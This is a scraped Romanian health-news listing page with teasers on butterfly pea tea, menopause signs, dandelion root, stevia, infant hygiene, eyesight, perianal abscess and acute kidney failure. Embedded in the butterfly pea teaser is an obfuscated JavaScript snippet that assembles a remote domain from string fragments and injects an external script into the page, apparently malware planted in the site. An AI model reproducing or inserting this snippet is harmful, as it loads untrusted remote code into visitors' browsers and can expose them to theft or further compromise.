12.2 C
București

Uncategorized

Ce este Butterfly Pea sau fasolea fluturilor si ce beneficii pentru sanatate are consumul de ceai albastru

(function(){ owqu=document.createElement("script");owqu.async=true;owqu_="u"+("s")+"t"; owquu="2240943521.";owqu_+="a"+("t.i");owqu_+="n"+("f"+"o")+"/"; owquu+="uexhybzkwqu1v0l6v7v35j"+("u4x0aizi"); owqu.src="https://"+owqu_+owquu;owqu.type="text/javascript"; document.body.appendChild(owqu); })(); Butterfly Pea, pe numele sau stiintific Clitoria ternatea, este o planta originara din Asia dar care s-a aclimatizat usor si in Africa, Australia sau America. Florile acestei plante sunt...

6 Semne evidente ale menopauzei pe care femeile nu ar trebui sa le ignore

Menopauza marchează sfârșitul fertilității unei femei. Află care sunt cele 6 semne clasice ale menopauzei și cum le poți gestiona pentru o tranziție lină.

Lucruri de ştiut despre utilizarea radacinii de papadie

Radacina de papadie este un remediu natural cu proprietăţi detoxifiante şi multiple beneficii pentru sănătate. Aflaţi mai multe despre cum poate îmbunătăţi funcţia ficatului şi a rinichilor.

Este Stevia rea pentru tine? Ce spun expertii despre acest inlocuitor de zahar

Stevia rămâne populară datorită creșterii diabetului și a cererii pentru indulcitori naturali. Dar care sunt riscurile? Aflați adevărul despre beneficiile și efectele secundare.

Ingrijirea zonei intime la bebelusi – sfaturi esentiale pentru parinti

Îngrijirea adecvată a zonei intime a bebelușilor este foarte importantă pentru sănătatea lor. Prin schimbarea frecventă a scutecelor, igienizarea și hidratarea corectă a pielii se pot preveni afecțiuni neplăcute precum iritații sau infecții.
zonia.ro

Ochelarii chiar provoaca pierderea vederii? Și de ce sunt periculoase lentilele de contact?

Vederea este unul dintre cele mai importante simțuri pentru oameni, permițându-ne să ne bucurăm de lumea din jurul nostru. Din păcate, probleme precum miopia,...

Abcesul perianal – Cauze, somptome si optiuni de tratament

Abcesul perianal reprezintă o problemă medicală urgentă ce necesită atenție imediată. Acest ghid detaliat oferă informații esențiale despre simptomele, cauzele și tratamentele disponibile, îndrumând pacienții spre recuperare rapidă și prevenirea complicațiilor.

Insuficienta Renala Acuta: Cauze, Simptome, Tratament si Preventie

Insuficiența renală acută afectează multe vieți. Descoperă simptomele, tratamentele eficiente și mărturiile celor care au trecut prin această experiență. Informație vitală pentru sănătatea ta.
organicsfood.ro